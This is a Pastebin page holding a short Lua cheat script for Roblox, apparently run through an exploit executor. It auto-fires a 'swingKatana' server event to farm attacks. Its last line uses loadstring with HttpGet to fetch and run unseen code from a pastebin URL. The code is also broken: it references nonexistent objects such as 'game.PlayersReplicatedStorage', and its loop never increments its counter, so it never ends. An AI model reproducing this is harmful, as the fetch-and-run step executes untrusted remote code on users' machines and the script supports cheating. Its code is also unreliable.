Advertisement
nyaouu

Roblox-Test

Oct 15th, 2024 (edited)
34
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.09 KB | None | 0 0
  1. if (not game:IsLoaded()) then
  2.     repeat
  3.         game.Loaded:Wait()
  4.     until game:IsLoaded()
  5. end
  6.  
  7. local wait = task.wait
  8.  
  9. repeat wait() until game.Players
  10. repeat wait() until game.Players.LocalPlayer
  11. repeat wait() until game.ReplicatedStorage
  12. repeat wait() until game.PlayersReplicatedStorage:FindFirstChild("Remotes")
  13. repeat wait() until game.PlayersReplicatedStorage:FindFirstChild("PlayerGui")
  14. repeat wait() until game.Players.LocalPlayer.PlayerGui:FindFirstChild("Main")
  15.  
  16. local LocalPlayer = game:GetService("Players").LocalPlayer
  17. local ReplicatedStorage = game:GetService("Players").ReplicatedStorage
  18. local StarterGui = game:GetService("StarterGui")
  19.  
  20. StarterGui:SetCore("SendNotification", {
  21.     Title="NYX";
  22.     Text="NYX";
  23.     Icon="rbxassetid://10258071211";
  24. })
  25.  
  26. local ninjaEvent = {}
  27. ninjaEvent.swingKatana = function()
  28.     local args = {
  29.         [1] = "swingKatana"
  30.     }
  31.     LocalPlayer.ninjaEvent:FireServer(unpack(args))
  32. end
  33.  
  34. local i = 0
  35. repeat
  36.     ninjaEvent.swingKatana()
  37.     wait(1)
  38. until i == 5
  39.  
  40. loadstring(game:HttpGet("https://pastebin.com/raw/iFYjXVQd"))();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement